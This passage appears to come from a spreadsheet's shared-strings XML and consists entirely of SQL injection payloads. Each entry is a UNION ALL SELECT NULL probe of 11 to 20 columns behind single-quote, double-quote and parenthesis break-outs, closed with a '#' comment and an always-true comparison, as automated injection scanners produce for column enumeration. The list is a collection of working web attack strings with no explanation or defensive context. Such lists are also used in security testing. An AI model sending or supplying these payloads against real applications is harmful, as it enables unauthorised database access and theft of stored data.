    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5876 = 5876</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6686 = 6686</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  4678 = 4678</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5066 = 5066</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5671 = 5671</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7873 = 7873</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3720 = 3720</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5272 = 5272</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7926 = 7926</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 4184 = 4184</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2028 = 2028</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 9385 = 9385</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 609 = 609</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7417 = 7417</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5802 = 5802</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3442 = 3442</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5322 = 5322</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 9652 = 9652</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7136 = 7136</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'gfjH' = 'gfjH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'VRph' = 'VRph</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'BYYw' = 'BYYw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Yrve' = 'Yrve</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'EDiZ' = 'EDiZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'RuAw' = 'RuAw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'hDeH' = 'hDeH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'RJVd' = 'RJVd</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'pKYD' = 'pKYD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'UUUt' = 'UUUt</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'KlUY' = 'KlUY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'biwv' = 'biwv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'MvWO' = 'MvWO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HKLP' = 'HKLP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DhRW' = 'DhRW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'YBsh' = 'YBsh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uRsQ' = 'uRsQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'yKOR' = 'yKOR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'cDMD' = 'cDMD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ErNz' = 'ErNz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CzUq' = 'CzUq</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'FofE' = 'FofE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'oUWm' = 'oUWm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'lYfN' = 'lYfN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'mNBz' = 'mNBz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'MFrh' = 'MFrh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'VKea' = 'VKea</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'kGLX' = 'kGLX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ZEPK' = 'ZEPK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dQMR' = 'dQMR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XVTJ' = 'XVTJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'qJmf' = 'qJmf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'chyd' = 'chyd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'HBWy' = 'HBWy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nMTQ' = 'nMTQ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nWIR' = 'nWIR</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'IrOc' = 'IrOc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XyhX' = 'XyhX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'FFJo' = 'FFJo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'BCKm' = 'BCKm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'niDd' LIKE 'niDd</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'OcuE' LIKE 'OcuE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'kMbj' LIKE 'kMbj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ByIe' LIKE 'ByIe</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'LQFr' LIKE 'LQFr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'MGtx' LIKE 'MGtx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Phsf' LIKE 'Phsf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'rphy' LIKE 'rphy</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'XusK' LIKE 'XusK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'nrOj' LIKE 'nrOj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'tmyk' LIKE 'tmyk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'epnr' LIKE 'epnr</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'oMMF' LIKE 'oMMF</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'sFWn' LIKE 'sFWn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uFKq' LIKE 'uFKq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uhGo' LIKE 'uhGo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'bpkT' LIKE 'bpkT</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DbPm' LIKE 'DbPm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'mtkw' LIKE 'mtkw</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hCpd' LIKE 'hCpd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Hugb' LIKE 'Hugb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'edFa' LIKE 'edFa</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'RcxF' LIKE 'RcxF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'nFIm' LIKE 'nFIm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'nVwc' LIKE 'nVwc</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ubpN' LIKE 'ubpN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'cnIA' LIKE 'cnIA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QAzi' LIKE 'QAzi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'zsKw' LIKE 'zsKw</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'xCzC' LIKE 'xCzC</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LdiD' LIKE 'LdiD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'UrSX' LIKE 'UrSX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hSfz' LIKE 'hSfz</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'PKgn' LIKE 'PKgn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'cFGQ' LIKE 'cFGQ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'YjXw' LIKE 'YjXw</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RajF' LIKE 'RajF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Bidp' LIKE 'Bidp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ZPXs' LIKE 'ZPXs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RxFy' LIKE 'RxFy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Loax" = "Loax</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kKlJ" = "kKlJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "yulH" = "yulH</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "oCob" = "oCob</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "YKHT" = "YKHT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "xxJN" = "xxJN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Ctxn" = "Ctxn</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "CaTc" = "CaTc</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ttIn" = "ttIn</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "fqVP" = "fqVP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "OmVN" = "OmVN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Mhxi" = "Mhxi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "rqXL" = "rqXL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "XgKa" = "XgKa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "yHte" = "yHte</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hiKv" = "hiKv</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Iagw" = "Iagw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "bmOS" = "bmOS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "MBey" = "MBey</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "PxXC" = "PxXC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "OrIk" = "OrIk</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ALwq" = "ALwq</t>
  </si>
  <si>
